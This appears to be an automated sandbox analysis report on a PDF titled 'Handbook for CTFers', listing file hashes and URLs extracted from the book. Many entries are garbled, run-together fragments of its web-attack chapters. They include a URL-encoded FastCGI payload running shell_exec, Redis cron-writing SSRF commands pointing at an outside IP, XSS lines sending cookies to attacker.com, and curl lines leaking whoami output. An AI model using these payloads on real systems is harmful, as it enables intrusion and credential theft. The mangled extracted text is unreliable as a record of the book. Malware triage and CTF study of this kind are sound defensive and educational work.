Behavioral task
behavioral1
Sample
Handbook for CTFers.pdf
Resource
win10v2004-20220414-es
General
-
Target
Handbook for CTFers.pdf
-
Size
45.9MB
-
MD5
dce4c0016a80787727ebcdab463588a1
-
SHA1
6311dc059260108666a33ddb7f81a4adcdca3bc5
-
SHA256
6d855933bcf3b00943a7b4b214ef3cf75435bba766ad5d03468f71ff8056b4f7
-
SHA512
00c62ad8efd8ba641d497b84acc88232cde776e1c22ce5200b6fd932cace06eae02a2eb5ec562bda30757eb38fabdb0855b8b99820cb5c242ae4d229ddd47c59
-
SSDEEP
786432:vstWYWZmPuDWq48b2oJNh25vzx0QSyN2DpbPRr1ri+8VUWhq4VIy:vstWYWZmWKe7UHeLLG6Gay
Malware Config
Signatures
Files
-
Handbook for CTFers.pdf.pdf
-
https://doi.org/10.1007/978-981-19-0336-6
-
https://nu1l.com
-
https://ctftime.org/ctf/240
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_1&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_1#DOI
-
https://github.com/denny0223/scrabble
-
https://github.com/WangYihang/GitHacker
-
https://github.com/kost/dvcs-ripper
-
https://github.com/maurosoria/dirsearch
-
http://192.168.20.133/sql1.php?id=2
-
https://github.com/Audi-1/sqli-labs
-
http://cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_2&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_2#DOI
-
http://baidu.com
-
https://github.com/tarunkant/Gopherus
-
http://dwz.cn/11SMa
-
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser.-In-Trending-Programming-Languages.pdf
-
https://github.com/n0b0dyCN/redis-rogue-server
-
http://www.baidu.com
-
https://github.com/opensec-cn/vtest
-
http://example.com
-
http://test.example.com
-
http://www.nu1l.com/exec/3.php?cmd=whoami%3etest
-
http://www.nu1l.com/
-
http://html5sec.org/
-
https://portswigger.net/blog/XSS-without-html-client-side-template-injection-with-angularjs%E3%80%82
-
http://window.name
-
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP
-
https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=http://qianbao.example.com
-
https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=xxxxxxxxxxxx://qianbao.example.com
-
https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=javascript:alert
-
http://www.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-Iconv-Truncate
-
http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context
-
https://www.php.net/manual/zh/ini.list.php
-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715
-
http://aliyuncs.com
-
http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/
-
https://github.com/BlackFan/jpg_payload
-
https://hackmd.io/s/Hk-2nUb3Q
-
https://www.php.net/manual/zh/filters.string.php
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_3&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_3#DOI
-
https://5haked.blogspot.jp/2016/10/how-i-hacked-pornhub-for-fun-and-profit.html?m=1
-
http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/
-
https://docs.python.org/3/library.xml.html/
-
https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/oh-my-raddit/src
-
https://github.com/shiltemann/CTF-writeups-public/blob/master/PicoCTF_2018/writeupfiles/server_noflag.py
-
http://converter.uni.hctf.fun/
-
https://github.com/pspaul/padding-oracle
-
https://github.com/CTFTraining/pwnhub_2017_open_weekday
-
https://github.com/bizonix/evalhook
-
https://github.com/CTFTraining/sctf_2018_
-
http://session.demo.com/
-
http://demo.meizj.com/pay.php?money=1000&purchaser=jack&productid=1001&seller=john
-
http://demo.meizj.com/
-
http://oauth.demo.com/main/oauth/?state=******
-
https://book-en.nu1l.com/
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_4&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_4#DOI
-
https://bbs.pediy.com/thread-246117-1.htm
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_5&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_5#DOI
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_6&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_6#DOI
-
https://wenku.baidu.com/view/afec9dd1d15abe23482f4d70.html
-
http://ddebs.ubuntu.com/
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_7&domain=pdf
-
https://wikipedia.org/
-
https://doi.org/10.1007/978-981-19-0336-6_7#DOI
-
https://atomcated.github.io/Vigenere/
-
https://github.com/Ciphey/Ciphey
-
https://gchq.github.io/CyberChef/
-
https://github.com/veritas501/attachment_in_blog/tree/master/Gadgetzan
-
https://github.com/pablocelayes/rsa-wiener-attack
-
https://github.com/mimoo/RSA-and-LLL-attacks
-
https://github.com/Ganapati/RsaCtfTool
-
https://github.com/bwall/HashPump
-
https://github.com/blockstack/secret-sharing
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_8&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_8#DOI
-
https://remix.ethereum.org
-
https://ropsten.etherscan.io
-
https://github.com/ethereum/go-ethereum
-
https://infura.io/
-
https://github.com/ethereum/wiki/wiki/JSON-RPC
-
https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258a
-
https://github.com/yuange1024/ethereum_yellowpaper
-
https://github.com/Hcamael/ethre_source/blob/master/hctf2018.sol
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_9&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_9#DOI
-
http://www.fifi.org/doc/jhead/exif-e.html
-
https://github.com/zed-0xff/zsteg
-
https://github.com/chishaxie/BlindWaterMark
-
https://www.wireshark.org/
-
https://www.wireshark.org/docs/man-pages/tshark.html
-
https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf
-
https://usb.org/sites/default/files/.documents/hid1_11.pdf
-
https://github.com/superponible/volatility-plugins
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_10&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_10#DOI
-
https://xdebug.org/download.php
-
http://49.4.78.51:32310/flag
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_11&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_11#DOI
-
https://github.com/wupco/weblogger
-
https://github.com/MaskRay/pcap-search
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_12&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_12#DOI
-
http://nmap.org/book/inst-source.html
-
https://pentestbox.org/zh/
-
https://github.com/Dliv3/Venom
-
https://github.com/Dliv3/Venom/releases/download/v1.0.2/Venom.v1.0.2.7z
-
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
-
https://github.com/SecureAuthCorp/impacket
-
https://github.com/worawit/MS17-010
-
https://docs.microsoft.com/en-us/sysinternals/downloads/autologon
-
https://docs.microsoft.com/
-
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
-
https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1
-
http://scanf.com
-
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html
-
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
-
https://adsecurity.org/?p=2011
-
https://adsecurity.org/?p=1640
-
https://doi.org/10.1007/978-981-19-0336-6Jointlypublishedwith,PublishingHouseofElectronicsIndustry,Beijing,P.R.ChinaTheprinteditionisnotforsaleinChina
-
https://doi.org/10.1007/978-981-19-0336-6_11
-
http://pythonGitHacker.py
-
http://readme.md
-
http://www.zip/rar/tar.gz:oftenthesourcecodesofawebsite.4.PersonalexperienceSomechallengemaintainersmodifytheirchallengelesonlineduringCTFonlinecompetitions,andSWPbackuplesaregeneratedduetovim�sfeature.Thusplayerscouldunintentionallygetsourcecodesorsensitivemessages.Fig.1.8ResultFig.1.9Getag81IntroductiontotheWeb
-
http://google.zip
-
http://2021-7-1.zip
-
http://WebPage.new
-
https://wwwcnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.htmlforthewriteups
-
http://views.IndexView.as
-
http://views.LoginView.as
-
http://views.LogoutView.as
-
http://views.StaticFilesView.as
-
http://headimg.do
-
http://url.open
-
http://upug.to
-
http://utils.md
-
http://myURL.host
-
http://blog.loli.network
-
http://untar.py/tmp/pwnhub/'.$name
-
http://le.open
-
http://le.is
-
http://cron_run.sh
-
http://21cn.com
-
http://smtp.21cn.com
-
http://le.fromds_storeimportDSStorewithDSStore.open
-
http://router.post
-
http://req.body.ua
-
http://r.data
-
https://hackmd.io
-
http://ctx.query.ua
-
http://returnaxios.post
-
http://....e.data
-
http://t.data
-
https://hackmd.io/aaacreateacontainerdockercreate-v/ag:/agindockeralpine--entrypoint
-
https://hackmd.io/aaaStartthecontainerdockerstartctf:url[method]=post&url[url]=http://127.0.0.1/containers/ctf/start&url[socketPath]=/var/run/docker.sock&url=https://hackmd.io/aaaRetrievetheagleinthedocker.url[method]=get&url[url]=http://127.0.0.1/containers/ctf/archive?path=/agindocker&url[socketPath]=/var/run/docker.sock&url=https://hackmd.io/aaa741IntroductiontotheWeb
-
http://52dandan.cc/public_html/cong.php
-
http://php...de
-
http://52dandan.com/public_html/youwillneverknowthisle_e2cd3614b63ccdcbfe7c8f07376fe431'
-
https://doi.org/10.1007/978-981-19-0336-6_283
-
http://suchasbaidu.com
-
http://example.com/?url=http://%s:%s'%
-
http://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75YouneedtoknowtheabsolutepathofaPHPleontheserverbecauseitisdeterminedtoincludewhethertheleexistsornotandthesecurity.limit_extensionscongurationitemmustbefollowedby.php.Generally,youcanusethedefault/var/www/html/index.php.Ifyoucannotknowthewebdirectory,youcanseethelistoflesinthedefaultPHPinstallation.SeeFig.2.12.TheresultsoftheattackusingExploitareshowninFig.2.13.Usenctolistenonaportandgetattacktrafc.SeeFig.2.14.URL-encodingthedatathereinyields.%01%01%03%EF%00%08%00%00%00%00%01%00%00%00%00%00%00%00%00%01%04%03%EF%01%E7%00%00%0E%02CONTENT_LENGTH410C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_interfacefastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%1BSCRIPT_FILENAME/usr/local/lib/php/PEAR.php%0B%1BSCRIPT_NAME/usr/local/lib/php/PEAR.php%09%1FPHP_VALUEauto_prepend_le%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%1BREQUEST_URI/usr/local/lib/php/PEAR.php%01%04%03%EF%00%00%00%00%01%05%03%EF%00%29%00%00%3C%3Fphp%20var_dump%28shell_exec%28%27uname%20-a%27%29%29%3B%3F%3E%01%05%03%EF%00%00%00%00%00%00942AdvancedWeb
-
https://github.com/tarunkant/Gopherus,isshowninFig.2.18.2.1.4SSRFBypassingSSRFalsohassomeWAFbypassscenarios,whichwillbebrieyanalyzedinthissection.2.1.4.1IPRestrictionsUseEnclosedalphanumericsinsteadofnumbersintheIPorlettersintheURL
-
http://suchas127.0.0.1.xip.io
-
http://dwz.cn/11SMa,seeFig.2.26.Sometimestheservermayltermanyprotocols.Forexample,only�http�or�https�isallowedintheincomingURL,soyoucanwritea302redirectiononyourserverandusetheGopherprotocoltoattacktheintranet.Redis,seeFig.2.27.Fig.2.21BypassresultFig.2.22Bypassresult1002AdvancedWeb
-
http://parse_urlgetthehostisbaidu.com
-
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser.-In-Trending-Programming-Languages.pdf.2.1.4.4DNSRebindingInsomecases,lteringforSSRFmayoccurasfollows:thehostisextractedfromtheincomingURL,thenDNSresolutionisperformed,theIPaddressisobtained,theIPaddressischeckedtoseeifitislegitimate,andifitpasses,thenthecurlisrequestedagain.IftheDNSresolutionoftherstrequestreturnsanormaladdress,buttheDNSresolutionofthesecondrequestreturnsamaliciousaddress,thentheDNSrebindingattackiscomplete.Fig.2.28Getag1042AdvancedWeb
-
http://reactor.run
-
http://www.x.cn:6379/cong:set:dir:/var/spool/cron/54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/cong:set:dblename:root54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/set:0:
-
http://www.x.cn:6379/saveTheresultsoftheattackareshowninFig.2.32.2.Guardnetcup2019easy_pythonTherewasachallengeonSSRFattacksonRedisinthe2019NetProtectionCup.Wereplayedthetopicafterthegameandanalyzeditasanexample.Fig.2.31phpinfo2.1SSRFVulnerabilities107
-
http://self.req.post
-
http://exp.do
-
https://github.com/n0b0dyCN/redis-rogue-server.Here,becauseofthetriggerpoints,itisimpossibletoruntheprocessprovidedbyexpabovestrictly.First,settheVPSslaveintheshell,thensetdblenametoexp.so,andperformthersttwostepsinexpmanually,asshowninFig.2.39.Then,removeallthefunctionsbehindtheloadmoduleandrunexpontheVPS.Finally,performtherestofthestepsmanuallyonRedisandreadtheagsusingthefunctionsprovidedbytheextension,seeFig.2.40.Fig.2.38Needtoperformapower-upFig.2.39Executionprocess2.1SSRFVulnerabilities111
-
http://1andwww.baidu.com
-
http://curlwww.vps.com
-
http://le.cat
-
http://standsforanystring.cat/tm?/*
-
https://github.com/opensec-cn/vtestfortesting.Afterbuildingit,starttestingitwiththefollowingtestcode.
-
http://1.HTTPchannelsAssumingyourdomainnameisexample.com
-
http://example.com/httplog/%xTheresultofechohelloexecutionissavedinthe%xvariablewiththeforcommandandthensplicedintotheURL.Aftertheabovecommandisexecuted,thesystem�sdefaultbrowserwillbecalledtoopenandaccessthespeciedwebsite,andeventually,theresultsoftheechohellocommandwillbeavailableontheplatform,seeFig.2.54.However,thedrawbackisthatthebrowserdoesnotclosewhenyoucallit,andthereisatruncationproblemwhenspecialcharactersorspacesareencountered,soyoucanborrowPowershellforextraneousdata.InPowershell2.0,executethefollowingcommand.for/F%xin
-
http://example.com/httplog/'+$a
-
http://totakeoutdata.Example.curlexample.com/`whoami`wgetexample.com/$
-
http://ping-nc1test.example.com
-
http://.UnderLinux.ping
-
http://.example.com
-
http://i.xxx.example.com
-
http://www.nu1l.com/exec/3.php?cmd�whoami
-
http://www.nu1l.com/again.exec/testtogettheresult,seeFig.2.56.2.2.3Real-lifeCommandExecutionChallengesandAnswersItisraretotestonlycommandinjectionchallengesinCTFcompetitions,buttheyareusuallycombinedintoothermoretechnicalchallenges,suchasdenylistbypass,Linuxwildcard,etc.Thefollowingaresomeclassicchallenges.2.2.3.12015HITCONBabyFirstThePHPcodeisasfollows.
-
http://limitingthecommandlengthtolessthanorequalto4.ls
-
http://leare.ls
-
http://attacker.com/a.js
-
http://attacker.com/1.html
-
http://html5sec.org/�.The�on�eventtriggerofmanytagsrequiresinteraction,suchasmouseoverandclick,thecodeisasfollows:
-
http://le.org/angular.js/1.4.6/angular.min.js
-
https://portswigger.net/blog/XSS-without-html-client-side-template-injection-with-angularjsFig.2.77Result1362AdvancedWeb
-
http://nu1l.com/?name=
-
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSPtointroduceCSP.CSP
-
http://.baidu.com
-
http://attacker.com/?cookie=xxxx
-
http://attacker.com/?c=
-
http://admin.government.vip:8000
-
http://admin.government.vip:8000/uploadinterfaceasanadministratortogettheag.
-
http://admin.government.vip:8000/hasltering,andmanyfunctionshavebeendeleted.Youneedtondawaytobypassitinordertotransmitthedata.Thelteringpartisasfollows:deletewindow.Function;deletewindow.eval;deletewindow.alert;Fig.2.90Taskpage2.3TheMagicofXSS145
-
http://deletewindow.post
-
http://date.to
-
http://government.vip
-
http://admin.government.vip:8000/';document.body.appendChild
-
https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�http://qianbao.example.comThecompany�scross-domainauthorizationURListheaboveURL,whichhasmultipleparameters:returntypereferstotheauthorizationtypethatcanbe302jumporform;�tpl�parameterreferstothespecicservicethatjumpedtothistime,thisistheabbreviationoftheservicename;theuparameteristheauthorizationURLcorrespondingtothisservice.Aftertesting,itisfoundthatthe302jumpisdirectlyredirectedtothesubdomainwiththepass302;theformreturnsanautomaticallysubmittedformandtheactionisthesubdomain,andtheparameteristheauthenticationparameter.Thistimetheproblemliesintheformjump.Asmentionedabove,thedomainvericationintheuparameterisverystrict,buttheprotocolnamevericationisnotstrict.Forexample:https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�xxxxxxxxxxxx://qianbao.example.comSuchaprotocolnamecanreturntheresponseheadercorrectly,butitisthelinkthat302jumpsover.IfitisnotalegalHTTP
-
https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�javascript:alert
-
http://www.example.com/%250aalert
-
https://wappass.example.com/v3/login/api/auth/?return_type=4&tpl=bp&u=javascript%3A//example.com/%250aeval
-
https://apps.xxxx.com/libs/jquery/2.1.4/jquery.min.js
-
https://xss.attack.com/xxx/attack.php?sign=
-
https://wappass.example.com/wp/?qrlogin&t=1526233652&error=0&sign=
-
https://wappass.example.com/wp/?qrlogin&v=1526234914892
-
http://www.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-Iconv-Truncate2.4.3FileSufxBlacklistVericationBypassFilesufxblacklistvericationistocreateablacklistofsufxes,checkwhetherthelesufxesareintheblacklistwhenuploading,donothingintheblacklist,anduploadthemiftheyarenot,soastorealizethelteringofuploadedles.2.4.3.1UploadFileRenameThetestcodeisshowninFig.2.105.Inthelenamerenamingscenario,onlythelesufxiscontrollable.Usuallyusesomemorepartiallesufxesthatcanbeparsedtobypasstheblacklistrestriction.ThecommonexecutablesufxesofPHPare�php3�,�php5�,�phtml�,�pht�,etc.ThecommonexecutablesufxesofASPare�cdx�,�cer�,�asa�,etc.AndJSPcantry�jspx�.SeeFig.2.106,whentheuploadedPHPlesisrestricted,youcanbypassitbyuploading�PHTML�les,asshowninFigs.2.107and2.108.Fig.2.103PHPcodeFig.2.104Result2.4FileUploadVulnerability157
-
http://a.ph
-
http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context.Whentheversionislowerthan2.3.8,becausethedefault�AllowOverride�is�All�,youcantrytouploadthe�.htaccess�letomodifypartoftheconguration,andusethe�SetHandler�tomakephpparsethespeciedle,asshowninFig.2.109.First,uploadthe�.htaccess�leandcongurethe�Files�directivetomakePHPparsethe�yu.txt�le,asshowninFig.2.110.Second,uploadthe�yu.txt�letothecurrentdirectory,atthistime�yu.txt�hasbeenparsedasaPHPle.Fig.2.109Thecontentof.htaccessFig.2.110Result2.4FileUploadVulnerability159
-
https://www.php.net/manual/zh/ini.list.php.Therearetwospecialcongurationsin�PHP_INI_PERDIR�mode:�auto_append_le�and�auto_prepend_le�.Theroleof�auto_prepend_le�istospecifyaletobeparsedbeforethemainleisparsed,andtheroleof�auto_append_le�istospecifyaletobeparsedafterthemainleisparsed,asshowninFig.2.112.Fig.2.111CongurationinPHP1602AdvancedWeb
-
http://x.php.xxx
-
https://cve.mitre.org/cgi-bin/cvename.cgi?name�CVE-2017-15715.AccordingtothedescriptionoftheCVE,itcanbeseenthatintheHTTPD2.4.0to2.4.29version,inthe�FilesMatch�directive,the�$�intheregularpatterncanmatchthenewlinecharacter,whichmaycausetheblacklisttobebypassed.
-
http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/2.4.5.4SomeWebCongurationsThatCanBeBypassedUsuallytheuploaddirectoryisconguredinthewebservertoprohibitleexecu-tion,anditmaybebypassedinthecaseofimproperconguration.1.Bypasscausedby�pathinfo�ThecongurationofNginxisasfollows:Fig.2.125PHPcodeFig.2.126ResultFig.2.127Result1682AdvancedWeb
-
http://yu.php.aaa
-
https://example.com/image.jpg
-
https://github.com/BlackFan/jpg_payload.ThetestcodeisshowninFig.2.137.First,uploadthenormalimagele,thendownloadtherenderedimage,run�jpg_payload.php�toprocessthedownloadedimage,injectthecodeintotheimagele,anduploadthenewlygeneratedimage.Youcanseethescriptcodeinjectedafter�imagecreatefromjpeg�stillexists,seeFig.2.138.2.4.7ExploitwithUploadtheGeneratedTemporaryFilePHPwillgeneratetemporarylesduringleupload,anddeletestemporarylesafteruploaded.Whenthereisalocalleinclusionvulnerabilitybuttheuploadfunctionisnotfoundandthereisnoletoinclude,youcantrytoincludethetemporarylegeneratedbytheuploadtocooperatewithit.Fig.2.137PHPcodeFig.2.138Executionprocess1742AdvancedWeb
-
http://session.upload_progress.name
-
https://hackmd.io/s/Hk-2nUb3Q.Fig.2.140Executionprocess1762AdvancedWeb
-
http://st.st
-
https://www.php.net/manual/zh/lters.string.php
-
http://sothemethodwillreturnfalse.is
-
https://doi.org/10.1007/978-981-19-0336-6_3195
-
http://www.nu1l.com:5555
-
https://5haked.blogspot.jp/2016/10/how-i-hacked-pornhub-for-Fig.3.8Result2023AdvancedWebChallenges
-
http://whichwasfurtherexplored.in
-
http://etc.to
-
http://belongtotheglobalmodule__builtins__.soyoucantry__builtins__.open
-
http://del__builtins__.open
-
http://__builtins__.open
-
http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/3.2SecurityIssuesinPython219
-
http://self.id
-
http://Trueapp.run
-
http://weusethenccommandtolistenontheporttoseethedatareceivedontheport.nc
-
https://docs.python.org/3/library.xml.html/.ThefollowingcodecontainstwocommonpayloadsforXXEattack,oneforreadinglesandtheotherforprobingtheintranet,andthenparsingtheXMLthereinviaPython.Thecodeitselfdoesnotrestricttheexternalentities,whichleadstoXXEvulnerabilities.#coding=utf-8importxml.saxx=
-
http://xxx.xxx.xxx.xxx/?data=%le;'
-
http://arandom.py
-
http://srandom.py
-
http://nowu.save
-
https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/oh-my-raddit/src.Accordingtothehint,agishitcon{ENCRYPTION_KEY},andweknowthatitisacombinationofpasswordandWeb;lookingatthehintinterface,itsays:assertENCRYPTION_KEY.islower
-
http://DES.new
-
http://app.py
-
https://github.com/shiltemann/CTF-writeups-public/blob/master/PicoCTF_2018/writeuples/server_noag.py.Underthe/agroute,theagisdisplayedtothepageonlyiftheAES-encryptedJSONstringstoredinthecookieisfetchedandtheadmineldis1.@app.route
-
http://Random.new
-
http://AES.new
-
http://converter.uni.hctf.fun/,whosemainfunctionistoenterastringfortheuserandconvertthedocumentinthatformattoanotherformatviatheserver'sconverter.NoteFig.3.40Paddingresult2403AdvancedWebChallenges
-
https://github.com/pspaul/padding-oracle.Withthehelpofit,youonlyneedtomodifyasmallpieceofcodetoimplementallthefeatures.Thecodeforthischallengeisasfollows:frompadding_oracleimportPaddingOraclefromoptimized_alphabetsimportjson_alphabetimportrequestsdeforacle
-
http://converter.uni.hctf.fun/convert',headers=headers
-
https://github.com/jbzteam/CTF/tree/master/BackdoorCTF2017
-
http://requests.post
-
https://extend-me-please.herokuapp.com/login',data=post,cookies=cookies
-
http://suchas.pyinPython.Pythoncompiles.py
-
http://ledownloadlimitsthatthe.py
-
https://github.com/CTFTraining/pwnhub_2017_open_weekday.ThechallengeprovidesabackupleprocessedbyPHPJiami,andyoucandownloadtheencryptedcodedirectly,asshowninFig.3.58.Therearealotofevalhookingplug-insourcecodeontheInternet,suchashttps://github.com/bizonix/evalhook,onlyneedtocompileandloadtothePHP,thenruntheencryptedcode,youcangetthedecryptedones,asshowninFig.3.59.Inadditiontocodeobfuscationinthisway,usingplug-instoencryptcodeisanotherwaytodoit.ThismethodhooksPHP'sunderlyingzend_compile_*,decryptsthesourcecodeinthefunctionafterthehook,andpassesthedecryptedsourcecodetothePHPexecutable.Forthistypeofencryption,wecanstilldecryptitinamannersimilartoevalhook.Fig.3.58TheencryptedcodedirectlyFig.3.59Thesourcecode2563AdvancedWebChallenges
-
https://github.com/CTFTraining/sctf_2018_babysyc.git.Bydownloadingtheindex.phpviaaarbitraryledownloadvulnerability,wefountitisencrypted.Bythecontentofphpinfo.php,weknowthattheserverhasapluginnamedencrypt_php,sowecandownloaditinthespeciedplug-indirectory.Analyzetheencryptionplug-in,whichhooksthezend_compile_le,asshowninFig.3.60.Lookagainatthelogicintheencrypt_compile_le.Attheendofthefunctionexecution,theencryptordirectlysendsthedecryptedresultbacktotheoriginalzend_compile_le,asshowninFig.3.61.Youcanprintthedecryptedcodebysimplychangingthepositionofthehookplug-insothatthehookfunctioniscalledafterthedecryptionfunction,asshowninFig.3.62.AnotherwaytoencryptistoencryptthecompiledOpcodes.Monitoringzend_compile_*willhavenoeffectbecausetheencryptionwon�tbecompiledinFig.3.60Analyzetheencryptionplug-in,whichhooksthezend_compile_leFig.3.61Process3.3CryptographyandReverseKnowledge257
-
http://session.demo.com/login.php?sessionId�xxxx;victimBexecutesAfterloggingin,thesessionIDcorrespondingtoSwillcontaintheidentifyinginformationofuserB.TheattackercanalsouseStogainaccesstothevictim'saccount.2.Data-relatedlogicalawsInreality,fortheshoppingsystemwithinterwovenbusinessfunctions,normalbusinessfunctionswillinvolveavarietyofscenarios,suchascommoditybalance,moneyexpenditure,commodityattributiondetermination,ordermodication,useofvouchers,etc.Purchaseofthesefunctions,forexample,intheprocessofbuyinginvolvesmerchantsbalancechangesofcommodity,thebuyeroftheamountofconsumption,suchasservertransactionhistorydata,becauseinvolvesmoretypesofdata,sointheactualdevelopmentprocess,forsomeofthedatatypeofthepossibilityofill-consideredcheckthen,suchascostamountistheamountofpositiveandnegativedecision,ifwecanchangeandotherissues.Theseproblemsareoftennotdirectlycausedbybugsatthecodelevel,butratherbyapartialfailureFig.3.69CookiesFig.3.70Cookies2643AdvancedWebChallenges
-
http://demo.meizj.com/pay.php?money�1000&purchaser�jack&productid�1001&seller�john.Theparametershavethefollowingmeanings:Moneyrepresentstheamountspentinthepurchase,Thepurchasers�username,Productidrepresentsthepurchaseinformation,andSellerrepresentstheseller�susername.IfthebackendpurchasefunctionisimplementedthroughthisURL,thenthebusinesslogiccanbedescribedas�purchaserspentmoneytobuytheproductidproductfromseller�.Whenthetransactioniscompletednormally,themoneyisFig.3.71Thevericationprocess3.4LogicFlaws265
-
http://demo.meizj.com/pay.php?money�1&purchaser�jack&productid�1001&seller�john.Atthispoint,theattackercompletesthepurchaseprocesswithonly1yuan.Thisisessentiallybecausethebackenddoesnotverifythetypeandformatofthedataeffectively,resultinginunexpectedsituations.Therefore,intheauthor�sopinion,data-relatedlogicvulnerabilitiesarebasicallycausedbyerrorsandomissionsindataverication.3.4.2LogicFlawsinCTFsComparedwithotherWebaws,logicawsusuallyrequirethecombinationofmultiplebusinessfunctionvulnerabilities.Therefore,theyoftenexistincomplexFig.3.72Theattackprocess2663AdvancedWebChallenges
-
http://oauth.demo.com/main/oauth/?state�******.Afteraccessingthelink,theOAuthaccountwillbeautomaticallyboundtoaregularaccount.ThekeyisthatordinaryuserscancompletethebindingofordinaryaccountandOAuthaccountbyaccessingthelinkwithToken.Similarly,theadministratorcanaccessthelinktocompletetheaccountbinding.Thearbitraryaddressskippingvulnerabilitycanbeusedtodeployanaddressskippingpageontheremoteserver.TheskippingaddressisthelinkboundwithToken.Whentheadministratoraccessesthesubmittedlink,itisrstredirectedtotheremoteserverandthenredirectedtothebindingpagetocompletethebindingbetweentheOAuthaccountandtheadminis-tratoraccount.Atthispoint,usetheOAuthaccounttoquicklylogintotheadministratoraccount.3.4.3SummaryofLogicalFlawsIncontrasttothevariousWebvulnerabilitiesmentionedearlier,thereisnoxedformatforpresentinglogicalvulnerabilities.Toexploitlogicholes,participantsneedtohaveagoodunderstandingofbusinessprocesses.Logicalvulnerabilityminingintherealenvironmentalsoneedstoconsideravarietyofauthenticationmethodsanddifferentbusinesslines,whicharenotdiscussedhere,readerscanndthefunintheirdailyworkandlife.3.5SummaryIngeneral,WebchallengesweretheeasiesttogetstartedinalldirectionsintheCTFcompetition.ThebookdividesthemainvulnerabilitiesinvolvedinWebtopicsintothreelevels:�gettingstarted�,�advanced�and�expanded�,eachwithonechapter,allowingreaderstostepbystep.However,becausetheclassicationofWebvulnerabilitiesisverycomplexandcomplicated,andtechnologyupdatesarefasterthanothertypesoftopics,readersareexpectedtosupplementrelevantknowledgewhilereadingthisbook,sothattheycanlearnfromoneanotherandimprovetheirownability.Fortherelevantcontentofthisbook,readerscanndcorrespondingsupportingexamplestopracticeontheN1BOOK
-
https://book-en.nu1l.com
-
https://doi.org/10.1007/978-981-19-0336-6_4269
-
http://schemas.android.com/apk/res/android
-
http://com.android.server.pm
-
http://andxposedminversionistheminimumversionoftheXposedFrameworkrequired.Fig.4.11ChoosetheapplicationtobedebuggedFig.4.12Choosethe.so
-
http://libc.so
-
http://Memory.read
-
http://elds__.map
-
http://libnative-lib.so
-
http://android.app
-
http://Usethefunctionandroid.os.Debug.is
-
http://androidxref.com/8.1.0_r33/xref/art/runtime/dex_le.cc#OpenCommon----------------------------------------------------------------------------------------Interceptor.attach
-
http://libart.so
-
http://com.xxx.xxx
-
http://dex_size.to
-
